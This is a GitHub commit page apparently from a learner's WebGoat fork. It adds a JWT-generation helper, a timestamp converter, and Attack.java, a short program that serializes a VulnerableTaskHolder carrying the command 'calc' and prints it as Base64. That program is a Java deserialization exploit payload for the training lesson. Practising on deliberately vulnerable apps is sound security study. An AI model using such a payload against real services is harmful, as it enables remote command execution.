-
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
7 changed files
with
165 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,2 @@ | ||
| Manifest-Version: 1.0 | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,41 @@ | ||
| package org.dummy.insecure.framework; | ||
|
|
||
| import java.io.ByteArrayOutputStream; | ||
| import java.io.FileOutputStream; | ||
| import java.io.IOException; | ||
| import java.io.ObjectOutputStream; | ||
| import java.util.Base64; | ||
|
|
||
| public class Attack { | ||
| public static void main(String[] args) throws Exception { | ||
| VulnerableTaskHolder evilObj = new VulnerableTaskHolder("mob", "calc"); | ||
|
|
||
| // 将序列化数据写入文件 | ||
| FileOutputStream fos = new FileOutputStream("serial"); // D:\IDEAProjects\WebGoat\serial | ||
| ObjectOutputStream os = new ObjectOutputStream(fos); | ||
| os.writeObject(evilObj); | ||
| os.close(); | ||
|
|
||
| // 序列化到字节数组并 base64 编码 | ||
| String base64Encoded = serializeToBase64(evilObj); | ||
| // 输出 Base64 编码的字符串 | ||
| System.out.println("Base64 Encoded Serialized Data:"); | ||
| System.out.println(base64Encoded); | ||
| } | ||
|
|
||
| // 获取 base64 编码后的序列化数据 | ||
| public static String serializeToBase64(Object evilObj) throws IOException { | ||
| // 序列化到字节数组 | ||
| ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); | ||
| ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); | ||
| objectOutputStream.writeObject(evilObj); | ||
| objectOutputStream.close(); | ||
|
|
||
| // 获取字节数组 | ||
| byte[] serializedBytes = byteArrayOutputStream.toByteArray(); | ||
| // Base64 编码 | ||
| String base64Encoded = Base64.getEncoder().encodeToString(serializedBytes); | ||
|
|
||
| return base64Encoded; | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
52 changes: 52 additions & 0 deletions
52
src/main/java/org/owasp/webgoat/lessons/jwt/mytest/CreateJwtTest.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,52 @@ | ||
| package org.owasp.webgoat.lessons.jwt.mytest; | ||
|
|
||
| import io.jsonwebtoken.Jwts; | ||
| import io.jsonwebtoken.SignatureAlgorithm; | ||
|
|
||
| import java.time.Instant; | ||
| import java.util.Date; | ||
|
|
||
| public class CreateJwtTest { | ||
|
|
||
| // 生成 JWT Token | ||
| public String generateToken(String secretKey, String subject, long expirationMillis) { | ||
| // 当前时间 | ||
| Date now = new Date(); | ||
|
|
||
| //Date test = Date.from(Instant.now().plusSeconds(60)); | ||
| //System.out.println(test); // Mon Jul 15 14:53:51 CST 2024 | ||
|
|
||
| // 计算过期时间 | ||
| Date expiration = new Date(now.getTime() + expirationMillis); | ||
| System.out.println(expiration); // Mon Jul 15 15:52:51 CST 2024 | ||
|
|
||
| // 获取时间戳 | ||
| long seconds = expiration.getTime() / 1000; | ||
| System.out.println("Seconds time: " + seconds); // Seconds time: 1721030281 | ||
|
|
||
| // 将时间戳转换回标准时间 | ||
| Date dateFromTimestamp = new Date(seconds * 1000); | ||
| System.out.println("Standard time: " + dateFromTimestamp); // Standard time: Mon Jul 15 15:58:01 CST 2024 | ||
|
|
||
| // 生成 JWT Token | ||
| String token = Jwts.builder() | ||
| .setSubject(subject) | ||
| .setIssuedAt(now) | ||
| .setExpiration(expiration) | ||
| .signWith(SignatureAlgorithm.HS256, secretKey) | ||
| .compact(); | ||
|
|
||
| return token; | ||
| } | ||
|
|
||
| public static void main(String[] args) { | ||
| String secretKey = "your_secret_key"; | ||
| String subject = "user123"; | ||
| long expirationMillis = 3600000; // 1 hour in milliseconds | ||
|
|
||
| CreateJwtTest createJwtTest = new CreateJwtTest(); | ||
| String token = createJwtTest.generateToken(secretKey, subject, expirationMillis); | ||
|
|
||
| System.out.println("Generated JWT Token: " + token); | ||
| } | ||
| } |
68 changes: 68 additions & 0 deletions
68
src/main/java/org/owasp/webgoat/lessons/jwt/mytest/DateTimeConverter.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,68 @@ | ||
| package org.owasp.webgoat.lessons.jwt.mytest; | ||
|
|
||
| import java.text.ParseException; | ||
| import java.text.SimpleDateFormat; | ||
| import java.util.Date; | ||
| import java.util.Scanner; | ||
|
|
||
| public class DateTimeConverter { | ||
|
|
||
| // 日期格式化 | ||
| private static final SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); | ||
|
|
||
| // 将标准时间转换为时间戳 | ||
| public static long dateToTimestamp(String dateStr) throws ParseException { | ||
| Date date = dateFormat.parse(dateStr); | ||
| return date.getTime() / 1000; | ||
| } | ||
|
|
||
| // 将时间戳转换为标准时间 | ||
| public static String timestampToDate(long timestamp) { | ||
| Date date = new Date(timestamp * 1000); | ||
| return dateFormat.format(date); | ||
| } | ||
|
|
||
| public static void main(String[] args) { | ||
| Scanner scanner = new Scanner(System.in); | ||
|
|
||
| while (true) { | ||
| System.out.println("请选择操作: "); | ||
| System.out.println("1. 标准时间转换为时间戳"); | ||
| System.out.println("2. 时间戳转换为标准时间"); | ||
| System.out.println("3. 退出"); | ||
| int choice = scanner.nextInt(); | ||
| scanner.nextLine(); // 读取换行符 | ||
|
|
||
| try { | ||
| switch (choice) { | ||
| case 1: | ||
| System.out.print("请输入标准时间 (格式: yyyy-MM-dd HH:mm:ss): "); | ||
| String dateStr = scanner.nextLine(); | ||
| long timestamp = dateToTimestamp(dateStr); | ||
| System.out.println("时间戳: " + timestamp); | ||
| break; | ||
| case 2: | ||
| System.out.print("请输入时间戳: "); | ||
| long ts = scanner.nextLong(); | ||
| scanner.nextLine(); // 读取换行符 | ||
| String date = timestampToDate(ts); | ||
| System.out.println("标准时间: " + date); | ||
| break; | ||
| case 3: | ||
| System.out.println("退出程序"); | ||
| scanner.close(); | ||
| return; | ||
| default: | ||
| System.out.println("无效的选择,请重新选择"); | ||
| } | ||
| } catch (ParseException e) { | ||
| System.out.println("日期格式错误,请输入正确的日期格式"); | ||
| } catch (Exception e) { | ||
| System.out.println("发生错误: " + e.getMessage()); | ||
| } | ||
|
|
||
| System.out.println(); // 输出空行分隔 | ||
| } | ||
| } | ||
| } | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters